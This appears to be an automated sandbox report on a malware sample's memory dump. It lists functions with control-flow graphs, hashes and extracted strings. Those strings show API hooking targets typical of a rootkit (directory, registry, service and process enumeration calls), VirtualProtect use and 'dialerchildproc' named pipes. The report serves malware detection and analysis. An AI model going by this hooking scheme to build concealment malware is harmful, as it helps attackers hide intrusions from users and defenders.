2809238536c-280923853ba call 28092388c60 178->180 181 2809238535c-28092385369 178->181 179->160 184 280923853c2-280923853ca 180->184 181->180 185 280923853d0-280923854bb call 28092387440 184->185 186 280923854d7-280923854df 184->186 197 280923854bd 185->197 198 280923854bf-280923854ce call 28092384060 185->198 188 280923854e1-280923854f4 call 28092384590 186->188 189 28092385523-2809238552b 186->189 203 280923854f8-28092385521 188->203 204 280923854f6 188->204 190 2809238552d-28092385535 189->190 191 28092385537-28092385546 189->191 190->191 194 28092385554-28092385561 190->194 195 28092385548 191->195 196 2809238554f 191->196 201 28092385563 194->201 202 28092385564-280923855b9 call 280923885c0 194->202 195->196 196->194 197->186 207 280923854d0 198->207 208 280923854d2 198->208 201->202 210 280923855c8-28092385661 call 28092384510 call 28092384470 VirtualProtect 202->210 211 280923855bb-280923855c3 202->211 203->186 204->189 207->186 208->184 216 28092385671-280923856d1 210->216 217 28092385663-28092385668 GetLastError 210->217 216->140 217->216
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                      • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                                                                      • Instruction ID: c10e9cb3c1da2138da732a3eaf92537c782f9e8239feff42a9c8eab5142d91eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0402CC3621AB8486EBA0CB55E49535AB7B1F3C8B94F118115FADE87B69DF7CC448CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923839E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual$AllocQuery
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 31662377-0
                                                                                                                                                                                                      • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                                                                      • Instruction ID: 7110fa36dabdce1eb22e901ce66e00e4fe4a513c646c0970f761336d1381bc64
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65316C2521BA8481EBB0DB15E0DA35E76A4F38CF84F10C525F5DD0AB9ADF7DC1448B04
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1683269324-0
                                                                                                                                                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                                      • Instruction ID: dd9417db42475d693b9046a82abaa77db6dc5fbe5d9c87c4060757cd8a10cd86
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54111E7961664182FBE09721F9CF3592294A79CF45F50C125F97E49793EFB8C14C8710
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092384DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3733156554-0
                                                                                                                                                                                                      • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                                                                      • Instruction ID: 7ff0bc90c7417ea505ba44d75ec9cd756d9ba22a1f8dffda1187d65e7492569d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBF01D2A619B0480D770DB45E48A35AABA0F38CFD4F14C111FADD0BB6ACE38C5888B00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092381ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: GetProcessHeap.KERNEL32 ref: 0000028092381633
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: HeapAlloc.KERNEL32 ref: 0000028092381642
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 00000280923816B2
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 00000280923816DF
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923816F9
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381719
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 0000028092381734
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381754
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 000002809238176F
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 000002809238178F
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923817AA
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 00000280923817CA
                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 0000028092381AD7
                                                                                                                                                                                                      • SleepEx.KERNEL32 ref: 0000028092381ADD
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923817E5
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381805
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 0000028092381820
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381840
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 000002809238185B
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 000002809238187B
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 0000028092381896
                                                                                                                                                                                                        • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923818A0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1534210851-0
                                                                                                                                                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                                      • Instruction ID: 571647a4fe7cf175e02ab82d363b130e28844f34c49a9e6fb3c918f9ce66d2d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8631106921364141FFD19B2ADACB3A963A5AB4CFD0F04D421EEAD8B297FF24C459C310
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092383844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 304 28092383844-2809238384f 305 28092383869-28092383870 304->305 306 28092383851-28092383864 StrCmpNIW 304->306 306->305 307 28092383866 306->307 307->305
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: dialer
                                                                                                                                                                                                      • API String ID: 0-3528709123
                                                                                                                                                                                                      • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                                                                      • Instruction ID: 23c2def3e7017a57e0d0a9c06af34614ea317c3275decb7922654cbbafc2f18d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D05E68353209C6FBD4AFA688CE6602350AB0CF44F88C120D92805251EF58898D9B10
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 0000028092382B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 424 28092382b2c-28092382ba5 call 280923a2ce0 427 28092382bab-28092382bb1 424->427 428 28092382ee0-28092382f03 424->428 427->428 429 28092382bb7-28092382bba 427->429 429->428 430 28092382bc0-28092382bc3 429->430 430->428 431 28092382bc9-28092382bd9 GetModuleHandleA 430->431 432 28092382bdb-28092382beb GetProcAddress 431->432 433 28092382bed 431->433 434 28092382bf0-28092382c0e 432->434 433->434 434->428 436 28092382c14-28092382c33 StrCmpNIW 434->436 436->428 437 28092382c39-28092382c3d 436->437 437->428 438 28092382c43-28092382c4d 437->438 438->428 439 28092382c53-28092382c5a 438->439 439->428 440 28092382c60-28092382c73 439->440 441 28092382c83 440->441 442 28092382c75-28092382c81 440->442 443 28092382c86-28092382c8a 441->443 442->443 444 28092382c9a 443->444 445 28092382c8c-28092382c98 443->445 446 28092382c9d-28092382ca7 444->446 445->446 447 28092382d9d-28092382da1 446->447 448 28092382cad-28092382cb0 446->448 449 28092382ed2-28092382eda 447->449 450 28092382da7-28092382daa 447->450 451 28092382cc2-28092382ccc 448->451 452 28092382cb2-28092382cbf call 2809238199c 448->452 449->428 449->440 453 28092382dbb-28092382dc5 450->453 454 28092382dac-28092382db8 call 2809238199c 450->454 456 28092382cce-28092382cdb 451->456 457 28092382d00-28092382d0a 451->457 452->451 461 28092382df5-28092382df8 453->461 462 28092382dc7-28092382dd4 453->462 454->453 456->457 464 28092382cdd-28092382cea 456->464 458 28092382d3a-28092382d3d 457->458 459 28092382d0c-28092382d19 457->459 466 28092382d4b-28092382d58 lstrlenW 458->466 467 28092382d3f-28092382d49 call 28092381bbc 458->467 459->458 465 28092382d1b-28092382d28 459->465 470 28092382dfa-28092382e03 call 28092381bbc 461->470 471 28092382e05-28092382e12 lstrlenW 461->471 462->461 469 28092382dd6-28092382de3 462->469 472 28092382ced-28092382cf3 464->472 475 28092382d2b-28092382d31 465->475 477 28092382d5a-28092382d64 466->477 478 28092382d7b-28092382d8d call 28092383844 466->478 467->466 482 28092382d93-28092382d98 467->482 479 28092382de6-28092382dec 469->479 470->471 489 28092382e4a-28092382e55 470->489 473 28092382e14-28092382e1e 471->473 474 28092382e35-28092382e3f call 28092383844 471->474 481 28092382cf9-28092382cfe 472->481 472->482 473->474 483 28092382e20-28092382e33 call 2809238152c 473->483 484 28092382e42-28092382e44 474->484 475->482 485 28092382d33-28092382d38 475->485 477->478 488 28092382d66-28092382d79 call 2809238152c 477->488 478->482 478->484 479->489 490 28092382dee-28092382df3 479->490 481->457 481->472 482->484 483->474 483->489 484->449 484->489 485->458 485->475 488->478 488->482 495 28092382ecc-28092382ed0 489->495 496 28092382e57-28092382e5b 489->496 490->461 490->479 495->449 500 28092382e5d-28092382e61 496->500 501 28092382e63-28092382e7d call 280923885c0 496->501 500->501 503 28092382e80-28092382e83 500->503 501->503 506 28092382e85-28092382ea3 call 280923885c0 503->506 507 28092382ea6-28092382ea9 503->507 506->507 507->495 509 28092382eab-28092382ec9 call 280923885c0 507->509 509->495
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                                                                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                                      • Instruction ID: 8d733604170286cffb0f2c554e6950e1b2005f45819a2a9e3e21b1e0a6316c75
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B1B57A212A9082EBD48F26D88A76963A5F74CF84F04D016FE6D5B796EF34CD48C740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092387D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                                      • Instruction ID: 75b80e033522ba6b35962cddfca1e4b58c22d828bd3a6d63b5f009fc74084ca6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8731507A216B8086EBA0DF60E8853ED7361F789B44F44C42ADA5D47B99EF78C54CC710
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                                      • Instruction ID: af83be6e397a46e77d4b4b82d8c3c5c00ae88e2dcdecc4550d779e7ff93ff614
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C131863A215F8086DBA0DF25E88539E73A0F78DB94F50C125EAAD47B59DF78C149CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092387960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                                      • Instruction ID: ad320acbeb40f035ead22dbb47744a96d6391c80115a4a777b7aaf29dfc86251
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F11332A712F0189EB80CF60E89A3A933A4F71DB58F448D21DA7D467A5DF78C199C780
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                                                                      • Instruction ID: 42b84e0865e9c07b727f5a7b9c9cf13b0063dfb274d7a4397b02992aa11e0958
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251C42670179099FB60AB72A88979A7BA1B748F94F14C115FE6C2BB9ADE38C505C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923942F0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                                                                      • Instruction ID: 881a1123346d4f1d855a82eb134a799bc70400ada81a334d4ee8e2ab18b2dbd0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F04F756152948EDBE88F29A98771A77A1F3087C0F80C029D69D83E04DA3C80648F04
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                                                                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                                      • Instruction ID: 503cf3ea9fcb1b73c0d6a39619e720d223b7728c2ee9f1207ddaf000f18961da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC514C3A616B84C6EB90DF62E48935A77A1F789FC9F04C125DA5A0772ADF7CC049CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092381D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                                                                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                                      • Instruction ID: 6484679db389c6d7e0f3dd3690d7e37080f868fb7835729460b24f184e79c44c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1531746C112A4AE0EBC5FB66EDDB6D46320B74DF44F80D123E47D1A5679E78828DC350
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000002809238CE37
                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CE4C
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CE6D
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CE9A
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CEAB
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CEBC
                                                                                                                                                                                                      • SetLastError.KERNEL32 ref: 000002809238CED7
                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF0D
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000002809238ECCC,?,?,?,?,000002809238BF9F,?,?,?,?,?,0000028092387AB0), ref: 000002809238CF2C
                                                                                                                                                                                                        • Part of subcall function 000002809238D6CC: HeapAlloc.KERNEL32 ref: 000002809238D721
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF54
                                                                                                                                                                                                        • Part of subcall function 000002809238D744: HeapFree.KERNEL32 ref: 000002809238D75A
                                                                                                                                                                                                        • Part of subcall function 000002809238D744: GetLastError.KERNEL32 ref: 000002809238D764
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF65
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF76
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 570795689-0
                                                                                                                                                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                                      • Instruction ID: 46014ec9a305486ebe501d147826e473f3ecfcde2eb19fc67d57a7eee9eb2729
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87413A2C21324842FBECA73555DF36922825B8CFB0F54CB24F97E5E6E7DE6894098700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092382244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                                                                      • API String ID: 2171963597-1373409510
                                                                                                                                                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                                      • Instruction ID: 737b34abbb822d793e95a8b0942baec510122db952636b9ca102555e3326cb9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
